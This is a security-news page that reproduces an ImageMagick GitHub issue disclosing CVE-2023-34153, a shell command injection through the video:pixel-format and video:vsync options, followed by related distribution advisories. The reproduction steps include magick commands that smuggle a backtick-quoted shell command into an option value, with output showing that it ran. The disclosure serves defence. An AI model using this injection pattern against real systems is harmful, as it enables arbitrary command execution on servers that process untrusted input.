Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-34153: Shell command injection vulnerability via `video:vsync` or `video:pixel-format` options in VIDEO encoding/decoding. · Issue #6338 · ImageMagick/ImageMagick

A vulnerability was found in ImageMagick. This security flaw causes a shell command injection vulnerability via video:vsync or video:pixel-format options in VIDEO encoding/decoding.

CVE
#vulnerability#linux#pdf#auth

ImageMagick version

7.1.0-1

Operating system

Linux

Operating system, version and so on

Any

Description

In reviewing historical vulnerabilities in ImageMagick, I discovered a shell command injection vulnerability in encoding/decoding VIDEO files, which very much resembles CVE-2020-29599.

In commit cc4638d, extra options are supported in VIDEO decode delegate execution, and through later commits, ImageMagick supports user-defined options video:vsync and video:pixel-format, with their values concatenated into delegate command executed via ExternalDelegateCommand.

In ExternalDelegateCommand, the command string is sanitized with SanitizeString, scanned for illegal chars then system(). However, the illegal char set contains only "&;<>|", not quot (see link). This is the same mistake as in sanitizing -authenticate parameter in PDF password support, but the common vulnerability in ExternalDelegateCommand did not get fixed.

Steps to Reproduce****Trigger the vulnerability in VIDEO decoding

Given a normal video file, namely test.mov, the following demonstrates how command injection happens.

/data/home/fullwaywang/exp ➜ echo ‘deadbeef’ > test.txt

/data/home/fullwaywang/exp ➜ magick identify -define video:pixel-format=’rgba"`cat test.txt > /tmp/leak.txt`"’ test.mov >info.log

/data/home/fullwaywang/exp ➜ tail info.log test.mov[891] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.320u 0:00.312 test.mov[892] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.310u 0:00.298 test.mov[893] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.290u 0:00.285 test.mov[894] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.280u 0:00.271 test.mov[895] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.260u 0:00.258 test.mov[896] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.250u 0:00.244 test.mov[897] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.230u 0:00.231 test.mov[898] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.220u 0:00.218 test.mov[899] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.210u 0:00.204 test.mov[900] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 445.5MiB 0.200u 0:00.191

/data/home/fullwaywang/exp ➜ cat /tmp/leak.txt deadbeef

Trigger the vulnerability in VIDEO encoding

Given a normal image file, namely smile.gif, the following demonstrates how command injection happens.

/data/home/fullwaywang/exp ➜ magick convert -define video:pixel-format=’rgba"`cat test.txt > /tmp/leak3.txt`"’ smile.gif smile.mov

/data/home/fullwaywang/exp ➜ cat /tmp/leak3.txt deadbeef

Images

No response

Reporter

fullwaywang

Related news

Ubuntu Security Notice USN-6200-2

Ubuntu Security Notice 6200-2 - USN-6200-1 fixed vulnerabilities in ImageMagick. Unfortunately these fixes were incomplete for Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. This update fixes the problem.

Gentoo Linux Security Advisory 202405-02

Gentoo Linux Security Advisory 202405-2 - Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. Versions greater than or equal to 6.9.13.0 are affected.

Ubuntu Security Notice USN-6200-1

Ubuntu Security Notice 6200-1 - It was discovered that ImageMagick incorrectly handled the "-authenticate" option for password-protected PDF files. An attacker could possibly use this issue to inject additional shell commands and perform arbitrary code execution. This issue only affected Ubuntu 20.04 LTS. It was discovered that ImageMagick incorrectly handled certain values when processing PDF files. If a user or automated system using ImageMagick were tricked into opening a specially crafted PDF file, an attacker could exploit this to cause a denial of service. This issue only affected Ubuntu 20.04 LTS.

CVE-2020-29599: ImageMagick - Shell injection via PDF password

ImageMagick before 6.9.11-40 and 7.x before 7.0.10-40 mishandles the -authenticate option, which allows setting a password for password-protected PDF files. The user-controlled password was not properly escaped/sanitized and it was therefore possible to inject additional shell commands via coders/pdf.c.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907